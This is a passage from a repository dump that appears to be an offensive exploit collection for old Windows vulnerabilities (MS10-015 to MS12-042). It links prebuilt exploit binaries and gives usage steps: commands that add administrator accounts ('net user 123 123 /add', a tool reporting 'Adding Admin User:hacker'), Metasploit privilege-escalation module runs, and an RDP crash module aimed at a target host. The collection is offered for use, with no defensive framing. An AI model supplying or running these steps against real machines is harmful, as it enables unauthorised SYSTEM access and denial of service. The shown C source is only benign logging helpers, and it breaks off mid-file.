SMB request. 5 | To exploit these vulnerabilities, an attacker must convince the user to initiate an SMB connection to a specially crafted SMB server. 6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS10-012](https://technet.microsoft.com/library/security/ms10-012) 10 | * [exp-db](https://www.exploit-db.com/exploits/12273/) 11 | * [SMB 路径名溢出漏洞 - CVE-2010-0020](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0020) 12 | * [SMB 内存损坏漏洞 - CVE-2010-0021](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0021) 13 | * [SMB 空指针漏洞 - CVE-2010-0022](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0022) 14 | * [SMB NTLM 身份验证缺少平均信息量漏洞 - CVE-2010-0231](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0231) 15 | 16 | -------------------------------------------------------------------------------- /MS10-015/MS10-015.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-015/MS10-015.zip -------------------------------------------------------------------------------- /MS10-015/MS10-015KB977165-CVE-2010-0232-Ms-Viru.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-015/MS10-015KB977165-CVE-2010-0232-Ms-Viru.rar -------------------------------------------------------------------------------- /MS10-015/README.md: -------------------------------------------------------------------------------- 1 | # MS10-015 2 | 3 | ``` 4 | This module will create a new session with SYSTEM privileges via the KiTrap0D exlpoit by Tavis Ormandy. 5 | If the session is use is already elevated then the exploit will not run. 6 | The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows. 7 | ``` 8 | - The POC was from [@Offensive Security](https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip) 9 | 10 | Vulnerability reference: 11 | * [MS10-015](https://technet.microsoft.com/en-us/library/security/ms10-015.aspx) 12 | * [CVE-2010-0232](https://www.exploit-db.com/exploits/11199/) 13 | 14 | ## Usage 15 | c:\\> vdmallowed.exe 16 | 17 | ![win2003](win2003.png) 18 | 19 | ## load the module within the Metasploit console 20 | ``` 21 | msf > use exploit/windows/local/ms10_015_kitrap0d 22 | msf exploit(ms10_015_kitrap0d) > show targets 23 | ...targets... 24 | msf exploit(ms10_015_kitrap0d) > set TARGET 25 | msf exploit(ms10_015_kitrap0d) > show options 26 | ...show and set options... 27 | msf exploit(ms10_015_kitrap0d) > exploit 28 | 29 | ``` 30 | 31 | 32 | # Reference 33 | - [http://www.7kb.org/520.html](http://www.7kb.org/520.html) 34 | 35 | 36 | -------------------------------------------------------------------------------- /MS10-015/screenshot.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-015/screenshot.png -------------------------------------------------------------------------------- /MS10-015/win2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-015/win2003.png -------------------------------------------------------------------------------- /MS10-048/2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-048/2003.png -------------------------------------------------------------------------------- /MS10-048/README.md: -------------------------------------------------------------------------------- 1 | # MS10-048 2 | 3 | ``` 4 | The Windows kernel-mode drivers in win32k.sys in Microsoft Windows XP SP2 and SP3, 5 | Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7 do not properly validate an unspecified system-call argument, 6 | which allows local users to cause a denial of service (system hang) via a crafted application, 7 | aka "Win32k Bounds Checking Vulnerability." 8 | ``` 9 | 10 | Vulnerability reference: 11 | * [MS10-048](https://technet.microsoft.com/library/security/ms10-048) 12 | * [CVE-2010-1887](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1887) 13 | 14 | 15 | ## Usage 16 | ``` 17 | c:\> x86.exe 18 | ``` 19 | ![2003](2003.png) 20 | 21 | 22 | 23 | ## References 24 | * [Windows x64下提权Exploit](https://www.secpulse.com/archives/1597.html) 25 | 26 | -------------------------------------------------------------------------------- /MS10-048/ms10048/ms10048.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-048/ms10048/ms10048.exe -------------------------------------------------------------------------------- /MS10-048/ms10048/ms10048X64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-048/ms10048/ms10048X64.exe -------------------------------------------------------------------------------- /MS10-059/Churraskito_exe.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-059/Churraskito_exe.zip -------------------------------------------------------------------------------- /MS10-059/MS10-059.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-059/MS10-059.exe -------------------------------------------------------------------------------- /MS10-059/README.md: -------------------------------------------------------------------------------- 1 | # MS10-059 2 | ``` 3 | 一些Windows应用中使用了 Tracing 功能记录调试信息。使用了这个 Tracing 功能的 Windows 进程会持续监控相关子键的变化,一旦注册表值发生了变化就会立即读取该值。 4 | 其中的一个注册表值为 FileDirectory,包含有 Windows目录名。在Local System 账号运行的服务连接到管道时拥有扮演权限的本地用户可以通过扮演为 Local System 账号(或Administrator等特权账号)提升权限。 5 | 注册表项对 Users 组开放了 Set Value 权限,因此任何通过认证的用户都可以设置任意值。 6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS10-059](https://technet.microsoft.com/library/security/ms10-059) 10 | * [CVE-2010-2554](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-2554) 11 | 12 | ## Usage 13 | ``` 14 | c:\> Churraskito.exe "C:\windows\system32\cmd.exe" "net user 123 123 /add" 15 | ``` 16 | 17 | ## References 18 | [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html) 19 | -------------------------------------------------------------------------------- /MS10-065/MS10-065-KB2124261-KB2271195-CVE-2010-1899-IIS7.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-065/MS10-065-KB2124261-KB2271195-CVE-2010-1899-IIS7.zip -------------------------------------------------------------------------------- /MS10-065/README.md: -------------------------------------------------------------------------------- 1 | # MS10-065 2 | ``` 3 | Stack consumption vulnerability in the ASP implementation in Microsoft Internet Information Services 4 | (IIS) 5.1, 6.0, 7.0, and 7.5 allows remote attackers to cause a denial of service (daemon outage) via a crafted request, 5 | related to asp.dll, aka "IIS Repeated Parameter Request Denial of Service Vulnerability." 6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS10-065](https://technet.microsoft.com/library/security/ms10-065) 10 | * [CVE-2010-1899](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2010-1899) 11 | * [exp-db](https://www.exploit-db.com/exploits/15167/) 12 | 13 | 14 | 15 | ## load the module within the Metasploit 16 | [msf](https://www.rapid7.com/db/modules/AUXILIARY/DOS/WINDOWS/HTTP/MS10_065_II6_ASP_DOS) 17 | ``` 18 | msf > use auxiliary/dos/windows/http/ms10_065_ii6_asp_dos 19 | msf auxiliary(ms10_065_ii6_asp_dos) > show actions 20 | ...actions... 21 | msf auxiliary(ms10_065_ii6_asp_dos) > set ACTION 22 | msf auxiliary(ms10_065_ii6_asp_dos) > show options 23 | ...show and set options... 24 | msf auxiliary(ms10_065_ii6_asp_dos) > run 25 | ``` -------------------------------------------------------------------------------- /MS10-092/Enviroment/FoxitReader411_enu_Setup.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS10-092/Enviroment/FoxitReader411_enu_Setup.exe -------------------------------------------------------------------------------- /MS10-092/README.md: -------------------------------------------------------------------------------- 1 | # MS10-092 2 | - Windows Task Scheduler Privilege Escalation 3 | ``` 4 | This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. 5 | When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. 6 | Also, In a default configuration, normal users can read and write the task files that they have created. 7 | By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. 8 | NOTE: Thanks to webDEViL for the information about disable/enable. 9 | ``` 10 | - The exp was from [@webDEViL](https://www.exploit-db.com/author/?a=587) 11 | 12 | Vulnerability reference: 13 | * [MS10-092](https://technet.microsoft.com/library/security/ms10-092) 14 | * [CVE-2010-3338](https://www.exploit-db.com/exploits/15589/) 15 | * [Task Scheduler '.XML' Privilege Escalation](https://www.exploit-db.com/exploits/19930/) 16 | 17 | ## Usage 18 | [MS10-092-YouTube](https://www.youtube.com/watch?v=gd-F1dlWBAw) 19 | 20 | 21 | 22 | ## load the module within the Metasploit 23 | [msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms10_092_schelevator) 24 | ``` 25 | msf > use exploit/windows/local/ms10_092_schelevator 26 | msf exploit(ms10_092_schelevator) > show targets 27 | ...targets... 28 | msf exploit(ms10_092_schelevator) > set TARGET 29 | msf exploit(ms10_092_schelevator) > show options 30 | ...show and set options... 31 | msf exploit(ms10_092_schelevator) > exploit 32 | ``` -------------------------------------------------------------------------------- /MS11-011/MS11-011.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-011/MS11-011.exe -------------------------------------------------------------------------------- /MS11-011/README.md: -------------------------------------------------------------------------------- 1 | # MS11-011 2 | 3 | 4 | Vulnerability reference: 5 | * [MS11-011](https://technet.microsoft.com/library/security/ms11-011) 6 | * [CVE-2010-4398](https://www.exploit-db.com/exploits/11199/) 7 | 8 | 9 | ## References 10 | [MS11-011漏洞分析](http://bbs.pediy.com/thread-130434.htm) 11 | 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /MS11-046/2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/2003.png -------------------------------------------------------------------------------- /MS11-046/2003_k8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/2003_k8.png -------------------------------------------------------------------------------- /MS11-046/MS11_46_k8.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/MS11_46_k8.exe -------------------------------------------------------------------------------- /MS11-046/README.md: -------------------------------------------------------------------------------- 1 | # MS11-046 2 | 3 | ``` 4 | The Ancillary Function Driver (AFD) supports Windows sockets applications and is contained in the afd.sys file. 5 | The afd.sys driver runs in kernel mode and manages the Winsock TCP/IP communications protocol. An elevation of 6 | privilege vulnerability exists where the AFD improperly validates input passed from user mode to the kernel. 7 | An attacker must have valid logon credentials and be able to log on locally to exploit the vulnerability. 8 | An attacker who successfully exploited this vulnerability could run arbitrary code in kernel mode 9 | (i.e. with NT AUTHORITY\SYSTEM privileges). 10 | ``` 11 | - The exp was from [@Tomislav Paskalev](https://www.exploit-db.com/author/?a=7919) 12 | 13 | Vulnerability reference: 14 | * [MS11-046](https://technet.microsoft.com/library/security/ms11-046) 15 | * [CVE-2011-1249](https://www.exploit-db.com/exploits/40564/) 16 | 17 | ## Usage 18 | ``` 19 | c:\\> MS11-046.exe 20 | ``` 21 | caidao 22 | ![2003_k8](2003_k8.png) 23 | 2003 local 24 | ![2003](2003.png) 25 | win7-x86 26 | ![win7](win7.png) 27 | 28 | -------------------------------------------------------------------------------- /MS11-046/ms11-046.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/ms11-046.exe -------------------------------------------------------------------------------- /MS11-046/win7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-046/win7.png -------------------------------------------------------------------------------- /MS11-062/40627.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-062/40627.exe -------------------------------------------------------------------------------- /MS11-062/MS11-062.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-062/MS11-062.exe -------------------------------------------------------------------------------- /MS11-062/README.md: -------------------------------------------------------------------------------- 1 | # MS11-062 2 | 3 | ``` 4 | An elevation of privilege vulnerability exists in the NDISTAPI.sys component of the 5 | Remote Access Service NDISTAPI driver.The vulnerability is caused when the NDISTAPI 6 | driver improperly validates user-supplied input when passing data from user mode 7 | to the Windows kernel. An attacker must have valid logon credentials and be able 8 | to log on locally to exploit the vulnerability. An attacker who successfully 9 | exploited this vulnerability could run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM privileges) 10 | ``` 11 | - The exp was from [@Tomislav Paskalev](https://www.exploit-db.com/author/?a=7919) 12 | 13 | Vulnerability reference: 14 | * [MS11-062](https://technet.microsoft.com/library/security/ms11-062) 15 | * [CVE-2011-1974](https://www.exploit-db.com/exploits/40627/) 16 | 17 | ## Usage 18 | If Admin have enable the **routing and remote access** service 19 | ![start_service](service_st.png) 20 | 21 | c:\\> MS11-62.exe 22 | 23 | ![win2003](win2003.png) 24 | 25 | -------------------------------------------------------------------------------- /MS11-062/service_st.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-062/service_st.png -------------------------------------------------------------------------------- /MS11-062/win2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-062/win2003.png -------------------------------------------------------------------------------- /MS11-080/2003_k8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/2003_k8.png -------------------------------------------------------------------------------- /MS11-080/MS11_80_k8.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/MS11_80_k8.exe -------------------------------------------------------------------------------- /MS11-080/README.md: -------------------------------------------------------------------------------- 1 | # MS11-080 2 | ``` 3 | This module exploits a flaw in the AfdJoinLeaf function of the afd. 4 | sys driver to overwrite data in kernel space. 5 | An address within the HalDispatchTable is overwritten 6 | and when triggered with a call to NtQueryIntervalProfile will execute shellcode. 7 | This module will elevate itself to SYSTEM, then inject the payload into another 8 | SYSTEM process before restoring it's own token to avoid causing system instability. 9 | ``` 10 | - The exp was from [@BHaFSec](www.bhafsec.com/files/windows/ms11-080.exe) 11 | 12 | Vulnerability reference: 13 | * [MS11-080](https://technet.microsoft.com/library/security/ms11-080) 14 | * [CVE-2011-2005](https://www.exploit-db.com/exploits/18176/) 15 | 16 | ## Usage 17 | ``` 18 | + c:\\> ms11-080.exe -O 2k3 19 | + c:\\> ms11-080-AddUser.exe -O 2k3 20 | + [*] Adding Admin User:hacker Pass:Hacked!... 21 | ``` 22 | caidao add user 23 | ![win2003_k8team](2003_k8.png) 24 | local 25 | ![win2003](win2003.png) 26 | win7 27 | ![win7](win7.jpg) 28 | 29 | ## load the module within the msf 30 | - [msf](https://www.rapid7.com/db/modules/exploit/windows/local/ms11_080_afdjoinleaf) 31 | ``` 32 | msf > use exploit/windows/local/ms11_080_afdjoinleaf 33 | msf exploit(ms11_080_afdjoinleaf) > show targets 34 | ...targets... 35 | msf exploit(ms11_080_afdjoinleaf) > set TARGET 36 | msf exploit(ms11_080_afdjoinleaf) > show options 37 | ...show and set options... 38 | msf exploit(ms11_080_afdjoinleaf) > exploit 39 | ``` 40 | -------------------------------------------------------------------------------- /MS11-080/ms11-080-AddUser.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/ms11-080-AddUser.exe -------------------------------------------------------------------------------- /MS11-080/ms11-080.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/ms11-080.exe -------------------------------------------------------------------------------- /MS11-080/win2003.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/win2003.png -------------------------------------------------------------------------------- /MS11-080/win7.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS11-080/win7.jpg -------------------------------------------------------------------------------- /MS12-020/MS12-020.rb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/MS12-020.rb -------------------------------------------------------------------------------- /MS12-020/MS12-020KB2621440-CVE-2012-0002.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/MS12-020KB2621440-CVE-2012-0002.rar -------------------------------------------------------------------------------- /MS12-020/MS12-020检测.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/MS12-020检测.zip -------------------------------------------------------------------------------- /MS12-020/README.md: -------------------------------------------------------------------------------- 1 | # MS12-020 2 | 3 | Blue Screen of Death 4 | ``` 5 | 端口:3389 6 | 远程桌面协议RDP拒绝访问漏洞(MS12-020) 7 | 8 | ``` 9 | 10 | Vulnerability reference: 11 | * [MS12-020](https://technet.microsoft.com/library/security/ms12-020) 12 | * [CVE-2012-0002](http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0002) 13 | 14 | ## msf Usage 15 | [YouTube-MS12-020 RDP Vunlnerability](https://www.youtube.com/watch?v=8FhEK296jPg) 16 | 17 | ``` 18 | msf > search ms12_020 19 | msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 20 | msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.1.35 21 | msf auxiliary(ms12_020_maxchannelids) > run 22 | ``` 23 | 24 | ![msf](msf.png) 25 | ![blue-death](blue-death.png) 26 | 27 | ## References 28 | * [msf利用远程桌面协议RDP拒绝访问漏洞(MS12-020)](http://blog.sina.com.cn/s/blog_4bf0ab590101gsq7.html) 29 | * [cve-2012-0002(ms12-020)深度分析报告](http://max.book118.com/html/2016/0314/37644373.shtm) 30 | * [http://www.7kb.org/524.html](http://www.7kb.org/524.html) -------------------------------------------------------------------------------- /MS12-020/blue-death.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/blue-death.png -------------------------------------------------------------------------------- /MS12-020/ms12-020.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/ms12-020.exe -------------------------------------------------------------------------------- /MS12-020/ms12-020_.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/ms12-020_.exe -------------------------------------------------------------------------------- /MS12-020/msf.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/msf.png -------------------------------------------------------------------------------- /MS12-020/rdpclient.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-020/rdpclient.rar -------------------------------------------------------------------------------- /MS12-042/README.md: -------------------------------------------------------------------------------- 1 | # MS12-042 2 | ``` 3 | Microsoft Service Bus 1.1 on Microsoft Windows Server 2008 R2 SP1 and Server 2012 Gold and R2 allows 4 | remote authenticated users to cause a denial of service (AMQP messaging outage) via crafted AMQP messages, 5 | aka "Service Bus Denial of Service Vulnerability." 6 | ``` 7 | 8 | Vulnerability reference: 9 | * [MS12-042](https://technet.microsoft.com/library/security/ms12-042) 10 | * [CVE-2014-2814](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2814) 11 | 12 | 13 | ## Usage 14 | ``` 15 | c:\> MS12-042.exe -pid xxx 16 | ``` 17 | * [YouTube](https://www.youtube.com/watch?v=whRRFOm-DLI&feature=youtu.be) 18 | 19 | ![win7](win7.png) 20 | 21 | -------------------------------------------------------------------------------- /MS12-042/Sysret(MS12-042).zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/Sysret(MS12-042).zip -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/junk.suo -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/MinHook/MinHook.x64.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/klsfct/getshell/292f152d9fd03dc71057c897082d6b1e489b6bad/MS12-042/sysret-source/junk/MinHook/MinHook.x64.lib -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/ReadMe.txt: -------------------------------------------------------------------------------- 1 | ======================================================================== 2 | CONSOLE APPLICATION : junk Project Overview 3 | ======================================================================== 4 | 5 | AppWizard has created this junk application for you. 6 | 7 | This file contains a summary of what you will find in each of the files that 8 | make up your junk application. 9 | 10 | 11 | junk.vcxproj 12 | This is the main project file for VC++ projects generated using an Application Wizard. 13 | It contains information about the version of Visual C++ that generated the file, and 14 | information about the platforms, configurations, and project features selected with the 15 | Application Wizard. 16 | 17 | junk.vcxproj.filters 18 | This is the filters file for VC++ projects generated using an Application Wizard. 19 | It contains information about the association between the files in your project 20 | and the filters. This association is used in the IDE to show grouping of files with 21 | similar extensions under a specific node (for e.g. ".cpp" files are associated with the 22 | "Source Files" filter). 23 | 24 | junk.cpp 25 | This is the main application source file. 26 | 27 | ///////////////////////////////////////////////////////////////////////////// 28 | Other standard files: 29 | 30 | StdAfx.h, StdAfx.cpp 31 | These files are used to build a precompiled header (PCH) file 32 | named junk.pch and a precompiled types file named StdAfx.obj. 33 | 34 | ///////////////////////////////////////////////////////////////////////////// 35 | Other notes: 36 | 37 | AppWizard uses "TODO:" comments to indicate parts of the source code you 38 | should add to or customize. 39 | 40 | ///////////////////////////////////////////////////////////////////////////// 41 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/junk.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | Header Files 23 | 24 | 25 | Header Files 26 | 27 | 28 | Header Files 29 | 30 | 31 | Header Files 32 | 33 | 34 | Header Files 35 | 36 | 37 | Header Files 38 | 39 | 40 | Header Files 41 | 42 | 43 | Header Files 44 | 45 | 46 | Header Files 47 | 48 | 49 | Header Files 50 | 51 | 52 | 53 | 54 | Source Files 55 | 56 | 57 | Source Files 58 | 59 | 60 | Source Files 61 | 62 | 63 | Source Files 64 | 65 | 66 | Source Files 67 | 68 | 69 | Source Files 70 | 71 | 72 | 73 | 74 | Source Files 75 | 76 | 77 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/junk.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/log.cpp: -------------------------------------------------------------------------------- 1 | #include "log.h" 2 | 3 | VOID 4 | REPORT_ERROR( 5 | IN PCHAR Function, 6 | OUT PERRORINFO ErrorInfo 7 | ) 8 | { 9 | ErrorInfo->dwErrorNum = GetLastError(); 10 | REPORT_ERROR_EX( Function, 11 | GetLastError(), 12 | ErrorInfo); 13 | } 14 | 15 | VOID 16 | REPORT_ERROR_EX( 17 | IN PCHAR Function, 18 | IN DWORD dwErrorNumber, 19 | OUT PERRORINFO ErrorInfo 20 | ) 21 | { 22 | BOOL bErrorHandle; 23 | HMODULE hErrorDllHandle; 24 | 25 | ErrorInfo->dwErrorNum = dwErrorNumber; 26 | bErrorHandle = FormatMessage( FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 27 | NULL, 28 | ErrorInfo->dwErrorNum, 29 | MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT), 30 | ErrorInfo->ErrorMsg, 31 | 256, 32 | NULL); 33 | if ( bErrorHandle == FALSE ) 34 | { 35 | // load library and check the error again for network related errors 36 | hErrorDllHandle = LoadLibraryEx( "netmsg.dll", 37 | NULL, 38 | DONT_RESOLVE_DLL_REFERENCES); 39 | if ( hErrorDllHandle != NULL ) 40 | { 41 | bErrorHandle = FormatMessage( FORMAT_MESSAGE_FROM_SYSTEM | FORMAT_MESSAGE_IGNORE_INSERTS, 42 | NULL, 43 | ErrorInfo->dwErrorNum, 44 | MAKELANGID(LANG_NEUTRAL,SUBLANG_DEFAULT), 45 | ErrorInfo->ErrorMsg, 46 | 256, 47 | NULL); 48 | } 49 | } 50 | if ( bErrorHandle == FALSE ) 51 | { 52 | strncpy(ErrorInfo->ErrorMsg,"Unknown Error", 256); 53 | } 54 | 55 | // allocate memory for completed error message 56 | ErrorInfo->CompletErrorMsg = (CHAR *) GlobalAlloc( GMEM_FIXED, 512 ); 57 | sprintf( ErrorInfo->CompletErrorMsg ,"%s failed with error %d (%s)\n", Function, ErrorInfo->dwErrorNum, ErrorInfo->ErrorMsg ); 58 | //snprintf instead ? 59 | DEBUG_PRINTF(L_ERROR,"%s",ErrorInfo->CompletErrorMsg); 60 | } 61 | 62 | 63 | VOID 64 | DEBUG_PRINTF( 65 | IN LEVEL Level, 66 | IN PCHAR Format, 67 | IN ... 68 | ) 69 | { 70 | CHAR Buffer[1024] = {0}; 71 | va_list Args; 72 | 73 | va_start(Args, Format); 74 | vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args); 75 | va_end(Args); 76 | 77 | #ifdef __DEBUG__ 78 | switch (Level) { 79 | case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer); break; 80 | case L_INFO: fprintf(stdout, "[+] %s\n", Buffer); break; 81 | case L_WARN: fprintf(stderr, "[*] %s\n", Buffer); break; 82 | case L_ERROR: fprintf(stderr, "[!] %s\n\a", Buffer); break; 83 | } 84 | fflush(stdout); 85 | fflush(stderr); 86 | return; 87 | #endif 88 | 89 | } -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/log.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #define __DEBUG__ 5 | #pragma once 6 | 7 | typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL; 8 | 9 | typedef struct _ERRORINFO { 10 | DWORD dwErrorNum; 11 | CHAR ErrorMsg[256]; 12 | CHAR *CompletErrorMsg; 13 | } ERRORINFO, *PERRORINFO; 14 | 15 | VOID 16 | DEBUG_PRINTF( 17 | IN LEVEL Level, 18 | IN PCHAR Format, 19 | IN ... 20 | ); 21 | 22 | VOID 23 | REPORT_ERROR_EX( 24 | IN PCHAR Function, 25 | IN DWORD dwErrorNumber, 26 | OUT PERRORINFO ErrorInfo 27 | ); 28 | 29 | VOID 30 | REPORT_ERROR( 31 | IN PCHAR Function, 32 | OUT PERRORINFO ErrorInfo 33 | ); -------------------------------------------------------------------------------- /MS12-042/sysret-source/junk/peutil.h: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #pragma once 4 | 5 | #define SIZE_OF_NT_SIGNATURE sizeof(IMAGE_NT_SIGNATURE) 6 | #define NTSIGNATURE(a) ((LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew)) 7 | #define OPTHDROFFSET(a) ((LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew + SIZE_OF_NT_SIGNATURE + sizeof (IMAGE_FILE_HEADER))) 8 | #define PEFHDROFFSET(a) ((LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew + SIZE_OF_NT_SIGNATURE)) 9 | #define SECHDROFFSET(a) ((LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew + SIZE_OF_NT_SIGNATURE + sizeof(IMAGE_FILE_HEADER) + sizeof(IMAGE_OPTIONAL_HEADER))) 10 | #define OPTHDROFFSET(a) ((LPVOID)((BYTE *)a + ((PIMAGE_DOS_HEADER)a)->e_lfanew + SIZE_OF_NT_SIGNATURE + sizeof (IMAGE_FILE_HEADER))) 11 | #define NUMOFSECTION(a) ((DWORD)((PIMAGE_FILE_HEADER) PEFHDROFFSET(a))->NumberOfSections); 12 | #define IsBitSet(val, bit) ((val) & (1 << (bit))) 13 | 14 | 15 | PVOID 16 